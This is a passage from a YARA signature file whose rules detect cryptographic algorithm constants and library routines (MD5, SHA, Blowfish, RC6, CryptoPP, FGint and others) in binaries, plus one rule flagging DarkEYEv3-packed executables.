D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 8B 45 F4 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 56 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FlyUtilsCnDES_ECB_Decrypt {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for FlyUtils.CnDES Decrypt ECB function\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D E8 89 5D EC 8B F9 89 55 F8 89 45 FC 8B 5D 18 8B 75 20 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 84 DB 74 18 8B D3 8D 4D EC 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 EC 8D 45 F8 E8 ?? ?? ?? ?? 85 FF 75 07 E8 ?? ?? ?? ?? 8B F8 85 F6 75 07 E8 ?? ?? ?? ?? 8B F0 8B 4D FC B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 57 6A 00 33 C9 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F0 33 D2 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 6A 00 6A 00 56 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 FF 75 14 FF 75 10 8B 45 0C 50 8B 4D F8 8B 55 F0 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 6A 00 8B 45 F0 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 08 8B 45 F0 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB 12 E9 ?? ?? ?? ?? 8B 45 08 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F0 33 D2 89 55 F0 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Elf_Hash {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for ElfHash\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.3\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 33 C9 8B DA 4B 85 DB 7C 25 43 C1 E1 04 33 D2 8A 10 03 CA 8B D1 81 E2 00 00 00 F0 85 D2 74 07 8B F2 C1 EE 18 33 CE F7 D2 23 CA 40 4B 75 DC 8B C1 5E 5B C3 }\r\n\t\t$c1 = { 53 33 D2 85 C0 74 2B EB 23 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 D7 8B C2 5B C3 }\r\n\t\t$c2 = { 53 56 33 C9 8B D8 85 D2 76 23 C1 E1 04 33 C0 8A 03 03 C8 8B C1 25 00 00 00 F0 85 C0 74 07 8B F0 C1 EE 18 33 CE F7 D0 23 C8 43 4A 75 DD 8B C1 5E 5B C3 }\r\n\t\t$c3 = { 53 56 57 8B F2 8B D8 8B FB 53 E8 ?? ?? ?? ?? 6B C0 02 71 05 E8 ?? ?? ?? ?? 8B D7 33 C9 8B D8 83 EB 01 71 05 E8 ?? ?? ?? ?? 85 DB 7C 2C 43 C1 E1 04 0F B6 02 03 C8 71 05 E8 ?? ?? ?? ?? 83 C2 01 B8 00 00 00 F0 23 C1 85 C0 74 07 8B F8 C1 EF 18 33 CF F7 D0 23 C8 4B 75 D5 8B C1 99 F7 FE 8B C2 85 C0 7D 09 03 C6 71 05 E8 ?? ?? ?? ?? 5F 5E 5B C3 }\r\n\t\t$c4 = { 53 33 D2 EB 2C 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CE 8B C2 5B C3 }\r\n\t\t$c5 = { 89 C2 31 C0 85 D2 74 30 2B 42 FC 74 2B 89 C1 29 C2 31 C0 53 0F B6 1C 11 01 C3 8D 04 1B C1 EB 14 8D 04 C5 00 00 00 00 81 E3 00 0F 00 00 31 D8 83 C1 01 75 E0 C1 E8 04 5B C3 }\r\n\t\t$c6 = { 53 33 D2 85 C0 74 38 EB 30 8B D9 80 C3 BF 80 EB 1A 73 03 80 C1 20 C1 E2 04 81 E1 FF 00 00 00 03 D1 8B CA 81 E1 00 00 00 F0 85 C9 74 07 8B D9 C1 EB 18 33 D3 F7 D1 23 D1 40 8A 08 84 C9 75 CA 8B C2 5B C3 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule BLOWFISH_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for Blowfish constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { D1310BA6 }\r\n\t\t$c1 = { A60B31D1 }\t\r\n\t\t$c2 = { 98DFB5AC }\r\n\t\t$c3 = { ACB5DF98 }\r\n\t\t$c4 = { 2FFD72DB }\r\n\t\t$c5 = { DB72FD2F }\r\n\t\t$c6 = { D01ADFB7 }\r\n\t\t$c7 = { B7DF1AD0 }\r\n\t\t$c8 = { 4B7A70E9 }\r\n\t\t$c9 = { E9707A4B }\r\n\t\t$c10 = { F64C261C }\r\n\t\t$c11 = { 1C264CF6 }\r\n\tcondition:\r\n\t\t6 of them\r\n}\r\n\r\nrule MD5_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for MD5 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t// Init constants\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { efcdab89 }\r\n\t\t$c2 = { 98badcfe }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { 01234567 }\r\n\t\t$c5 = { 89ABCDEF }\r\n\t\t$c6 = { FEDCBA98 }\r\n\t\t$c7 = { 76543210 }\r\n\t\t// Round 2\r\n\t\t$c8 = { F4D50d87 }\r\n\t\t$c9 = { 78A46AD7 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule MD5_API {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Looks for MD5 API\"\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$advapi32 = \"advapi32.dll\" wide ascii nocase\r\n\t\t$cryptdll = \"cryptdll.dll\" wide ascii nocase\r\n\t\t$MD5Init = \"MD5Init\" wide ascii\r\n\t\t$MD5Update = \"MD5Update\" wide ascii\r\n\t\t$MD5Final = \"MD5Final\" wide ascii\r\n\tcondition:\r\n\t\t($advapi32 or $cryptdll) and ($MD5Init and $MD5Update and $MD5Final)\r\n}\r\n\r\nrule RC6_Constants {\r\n\tmeta:\r\n\t\tauthor = \"chort (@chort0)\"\r\n\t\tdescription = \"Look for RC6 magic constants in binary\"\r\n\t\treference = \"https://twitter.com/mikko/status/417620511397400576\"\r\n\t\treference2 = \"https://twitter.com/dyngnosis/status/418105168517804033\"\r\n\t\tdate = \"2013-12\"\r\n\t\tversion = \"0.2\"\r\n\tstrings:\r\n\t\t$c1 = { B7E15163 }\r\n\t\t$c2 = { 9E3779B9 }\r\n\t\t$c3 = { 6351E1B7 }\r\n\t\t$c4 = { B979379E }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule RIPEMD160_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for RIPEMD-160 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA1_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA1 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 67452301 }\r\n\t\t$c1 = { EFCDAB89 }\r\n\t\t$c2 = { 98BADCFE }\r\n\t\t$c3 = { 10325476 }\r\n\t\t$c4 = { C3D2E1F0 }\r\n\t\t$c5 = { 01234567 }\r\n\t\t$c6 = { 89ABCDEF }\r\n\t\t$c7 = { FEDCBA98 }\r\n\t\t$c8 = { 76543210 }\r\n\t\t$c9 = { F0E1D2C3 }\r\n\t\t//added by _pusher_ 2016-07 - last round\r\n\t\t$c10 = { D6C162CA }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule SHA512_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for SHA384/SHA512 constants\"\r\n\t\tdate = \"2014-01\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 428a2f98 }\r\n\t\t$c1 = { 982F8A42 }\r\n\t\t$c2 = { 71374491 }\r\n\t\t$c3 = { 91443771 }\r\n\t\t$c4 = { B5C0FBCF }\r\n\t\t$c5 = { CFFBC0B5 }\r\n\t\t$c6 = { E9B5DBA5 }\r\n\t\t$c7 = { A5DBB5E9 }\r\n\t\t$c8 = { D728AE22 }\r\n\t\t$c9 = { 22AE28D7 }\r\n\tcondition:\r\n\t\t5 of them\r\n}\r\n\r\nrule TEAN {\r\n\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"Look for TEA Encryption\"\r\n\t\tdate = \"2016-08\"\r\n\tstrings:\r\n\t\t$c0 = { 2037EFC6 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule WHIRLPOOL_Constants {\r\n\tmeta:\r\n\t\tauthor = \"phoul (@phoul)\"\r\n\t\tdescription = \"Look for WhirlPool constants\"\r\n\t\tdate = \"2014-02\"\r\n\t\tversion = \"0.1\"\r\n\tstrings:\r\n\t\t$c0 = { 18186018c07830d8 }\r\n\t\t$c1 = { d83078c018601818 }\r\n\t\t$c2 = { 23238c2305af4626 }\r\n\t\t$c3 = { 2646af05238c2323 }\r\n\tcondition:\r\n\t\t2 of them\r\n}\r\n\r\nrule DarkEYEv3_Cryptor {\r\n\tmeta:\r\n\t\tdescription = \"Rule to detect DarkEYEv3 encrypted executables (often malware)\"\r\n\t\tauthor = \"Florian Roth\"\r\n\t\treference = \"http://darkeyev3.blogspot.fi/\"\r\n\t\tdate = \"2015-05-24\"\r\n\t\thash0 = \"6b854b967397f7de0da2326bdd5d39e710e2bb12\"\r\n\t\thash1 = \"d53149968eca654fc0e803f925e7526fdac2786c\"\r\n\t\thash2 = \"7e3a8940d446c57504d6a7edb6445681cca31c65\"\r\n\t\thash3 = \"d3dd665dd77b02d7024ac16eb0949f4f598299e7\"\r\n\t\thash4 = \"a907a7b74a096f024efe57953c85464e87275ba3\"\r\n\t\thash5 = \"b1c422155f76f992048377ee50c79fe164b22293\"\r\n\t\thash6 = \"29f5322ce5e9147f09e0a86cc23a7c8dc88721b9\"\r\n\t\thash7 = \"a0382d7c12895489cb37efef74c5f666ea750b05\"\r\n\t\thash8 = \"f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61\"\r\n\t\tscore = 55\r\n\tstrings:\r\n\t\t$s0 = \"\\\\DarkEYEV3-\" \r\n\tcondition:\r\n\t\tuint16(0) == 0x5a4d and $s0\r\n}\r\n\r\nrule Miracl_powmod\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl powmod\"\r\n\tstrings:\r\n\t\t$c0 = { 53 55 56 57 E8 ?? ?? ?? ?? 8B F0 8B 86 18 02 00 00 85 C0 0F 85 EC 01 00 00 8B 56 1C 42 8B C2 89 56 1C 83 F8 18 7D 17 C7 44 86 20 12 00 00 00 8B 86 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 06 8B 4E 10 3B C1 74 2E 8B 7C 24 1C 57 E8 ?? ?? ?? ?? 83 C4 04 83 F8 02 7C 33 8B 57 04 8B 0E 51 8B 02 50 E8 ?? ?? ?? ?? 83 C4 08 83 F8 01 0F 84 58 01 00 00 EB 17 8B 7C 24 1C 6A 02 57 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 3F 01 00 00 8B 8E C4 01 00 00 8B 54 24 18 51 52 E8 ?? ?? ?? ?? 8B 86 CC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule Miracl_crt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"Miracl crt\"\r\n\tstrings:\r\n\t\t$c0 = { 51 56 57 E8 ?? ?? ?? ?? 8B 74 24 10 8B F8 89 7C 24 08 83 7E 0C 02 0F 8C 99 01 00 00 8B 87 18 02 00 00 85 C0 0F 85 8B 01 00 00 8B 57 1C 42 8B C2 89 57 1C 83 F8 18 7D 17 C7 44 87 20 4A 00 00 00 8B 87 2C 02 00 00 85 C0 74 05 E8 ?? ?? ?? ?? 8B 46 04 8B 54 24 14 53 55 8B 08 8B 02 51 50 E8 ?? ?? ?? ?? 8B 4E 0C B8 01 00 00 00 83 C4 08 33 ED 3B C8 89 44 24 18 0F 8E C5 00 00 00 BF 04 00 00 00 8B 46 04 8B 0C 07 8B 10 8B 44 24 1C 51 52 8B 0C 07 51 E8 ?? ?? ?? ?? 8B 56 04 8B 4E 08 8B 04 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_a_exp_b_mod_c\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP a_exp_b_mod_c\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC ?? 00 00 00 56 8B B4 24 B0 00 00 00 57 6A 00 8B CE C7 44 24 0C 00 00 00 00 E8 ?? ?? ?? ?? 84 C0 0F 85 16 01 00 00 8D 4C 24 24 E8 ?? ?? ?? ?? BF 01 00 00 00 56 8D 4C 24 34 89 BC 24 A4 00 00 00 E8 ?? ?? ?? ?? 8B 06 8D 4C 24 3C 50 6A 00 C6 84 24 A8 00 00 00 02 E8 ?? ?? ?? ?? 8D 4C 24 48 C6 84 24 A0 00 00 00 03 E8 ?? ?? ?? ?? C7 44 24 24 ?? ?? ?? ?? 8B 8C 24 AC 00 00 00 8D 54 24 0C 51 52 8D 4C 24 2C C7 84 24 A8 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 4C 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 70 8D 4C 24 18 56 89 7C 24 60 E8 ?? ?? ?? ?? 8B 76 08 8D 4C 24 2C 56 57 C6 44 24 64 01 E8 ?? ?? ?? ?? 8D 4C 24 40 C6 44 24 5C 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 4C 24 6C 8B 54 24 68 8B 74 24 64 51 52 56 8D 4C 24 18 C7 44 24 68 03 00 00 00 E8 ?? ?? ?? ?? 8B 7C 24 4C 8B 4C 24 48 8B D7 33 C0 F3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 34 56 57 33 FF 8D 44 24 0C 89 7C 24 08 C7 44 24 10 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 89 44 24 14 8B 74 24 58 8D 4C 24 18 56 89 7C 24 48 E8 ?? ?? ?? ?? 8B 0E C6 44 24 44 01 51 57 8D 4C 24 2C E8 ?? ?? ?? ?? 8D 4C 24 30 C6 44 24 44 02 E8 ?? ?? ?? ?? C7 44 24 0C ?? ?? ?? ?? 8B 54 24 54 8B 44 24 50 8B 74 24 4C 52 50 56 8D 4C 24 18 C7 44 24 50 03 00 00 00 E8 ?? ?? ?? ?? 8B 4C 24 30 8B 7C 24 34 33 C0 F3 AB 8B 4C }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_modulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP modulo\"\r\n\tstrings:\r\n\t\t$c0 = { 83 EC 20 53 55 8B 6C 24 2C 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 04 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 04 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 04 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 34 33 C9 53 0B CA 55 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 2C 56 57 8B F1 33 FF 8D 4C 24 20 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 0C 89 7C 24 3C E8 ?? ?? ?? ?? 8B 44 24 48 8D 4C 24 0C 50 56 8D 54 24 28 51 52 C6 44 24 4C 01 E8 ?? ?? ?? ?? 8B 74 24 54 83 C4 10 8D 44 24 20 8B CE 50 E8 ?? ?? ?? ?? 8B 7C 24 18 8B 4C 24 14 8B D7 33 C0 F3 AB 52 E8 ?? ?? ?? ?? 8B 7C 24 30 8B 4C 24 2C 8B D7 33 C0 C7 44 24 10 ?? ?? ?? ?? 52 F3 AB E8 ?? ?? ?? ?? 8B 4C 24 3C 83 C4 08 8B C6 64 89 }\r\n\t\t$c2 = { 83 EC 24 53 55 8B 6C 24 30 8B D9 85 ED 89 5C 24 08 75 18 8D 4C 24 0C E8 ?? ?? ?? ?? 8D 44 24 0C 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D FF 56 85 CD 57 75 09 8B 53 0C 8B 02 23 C1 EB 76 8B CB E8 ?? ?? ?? ?? 83 FD 05 8B C8 77 2D 33 F6 33 FF 49 85 C0 74 18 8B 53 0C 8D 41 01 8D 14 8A 8B 0A 03 F1 83 D7 00 48 83 EA 04 85 C0 77 F1 6A 00 55 57 56 E8 ?? ?? ?? ?? EB 3B 33 C0 8B D1 49 85 D2 74 32 8B 54 24 10 33 DB 8D 71 01 8B 52 0C 8D 3C 8A 8B 17 33 ED 0B C5 8B 6C 24 38 33 C9 53 0B CA 55 }\r\n\t\t$c3 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 1C 56 57 8B F1 33 FF 8D 4C 24 0C 89 7C 24 08 E8 ?? ?? ?? ?? 8D 4C 24 18 89 7C 24 2C E8 ?? ?? ?? ?? 8B 44 24 38 8D 4C 24 18 50 56 8D 54 24 14 51 52 C6 44 24 3C 01 E8 ?? ?? ?? ?? 8B 74 24 44 83 C4 10 8D 44 24 0C 8B CE 50 E8 ?? ?? ?? ?? 8B 4C 24 18 8B 7C 24 1C 33 C0 F3 AB 8B 4C 24 1C 51 E8 ?? ?? ?? ?? 8B 4C 24 10 8B 7C 24 14 33 C0 F3 AB 8B 54 24 14 52 E8 ?? ?? ?? ?? 8B 4C 24 2C 83 C4 08 8B C6 64 89 0D 00 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_MontgomeryModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint MontgomeryModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c1 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 FC E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c2 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 ?? 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 ?? E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 }\r\n\t\t$c3 = { 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 8B F1 8B DA 89 45 D0 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 DC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 47 4C 47 00 64 FF 30 64 89 20 8D 55 D4 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF 8B D6 8B 45 D0 E8 ?? ?? ?? ?? 8D 55 D4 8B C7 E8 ?? ?? ?? ?? 3C 02 75 0D 8D 45 D4 E8 ?? ?? ?? ?? E9 02 02 00 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule FGint_FGIntModExp\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 E8 53 56 57 33 DB 89 5D ?? 8B F1 89 55 ?? 8B D8 8B 7D 08 8D 45 F4 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 EC 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 46 04 8B 40 04 83 E0 01 83 F8 01 75 0F 57 8B CE 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? EB ?? 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 F4 8B C3 E8 ?? ?? ?? ?? 8B 45 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_MulByInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint MulByInt\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 57 55 83 C4 E8 89 4C 24 04 8B EA 89 04 24 8B 04 24 8B 40 04 8B 00 89 44 24 08 8B 44 24 08 83 C0 02 50 8D 45 04 B9 01 00 00 00 8B 15 ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 04 33 F6 8B 7C 24 08 85 FF 76 6D BB 01 00 00 00 8B 04 24 8B 40 04 8B 04 98 33 D2 89 44 24 10 89 54 24 14 8B 44 24 04 33 D2 52 50 8B 44 24 18 8B 54 24 1C ?? ?? ?? ?? ?? 89 44 24 10 89 54 24 14 8B C6 33 D2 03 44 24 10 13 54 24 14 89 44 24 10 89 54 24 14 8B 44 24 10 25 FF FF FF 7F 8B 55 04 89 04 9A 8B 44 24 10 8B 54 24 14 0F AC D0 1F C1 EA 1F 8B F0 43 4F 75 98 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_DivMod\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDivMod\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 BC 53 56 57 8B F1 89 55 F8 89 45 FC 8B 5D 08 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 FC 8A 00 88 45 D7 8B 45 F8 8A 00 88 45 D6 8B 45 FC E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B D3 8B 45 FC E8 ?? ?? ?? ?? 8D 55 E0 8B 45 F8 E8 ?? ?? ?? ?? 8B 55 F8 8B 45 FC }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_FGIntDestroy\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-05\"\r\n\t\tdescription = \"FGint FGIntDestroy\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B D8 8D 43 04 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule FGint_Base10StringToGInt\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdate = \"2015-06\"\r\n\t\tversion = \"0.2\"\r\n\t\tdescription = \"FGint Base10StringToGInt\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC B9 04 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 8B DA 89 45 FC 8B 45 FC ?? ?? ?? ?? ?? 33 C0 55 ?? ?? ?? ?? ?? 64 FF 30 64 89 20 EB 12 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? 8B 45 FC 8A 00 2C 2D 74 11 04 FD 2C 0A 72 0B 8B 45 FC ?? ?? ?? ?? ?? 48 7F D4 8D 45 E4 50 B9 01 00 00 00 BA 01 00 00 00 8B 45 FC ?? ?? ?? ?? ?? 8B 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 18 C6 45 EB 00 8D 45 FC B9 01 00 00 00 BA 01 00 00 00 ?? ?? ?? ?? ?? EB 18 C6 45 EB 01 EB 12 8D 45 FC }\r\n\t\t$c1 = { 55 8B EC 83 C4 D8 53 56 57 33 C9 89 4D D8 89 4D DC 89 4D E0 89 4D E4 89 4D EC 8B DA 89 45 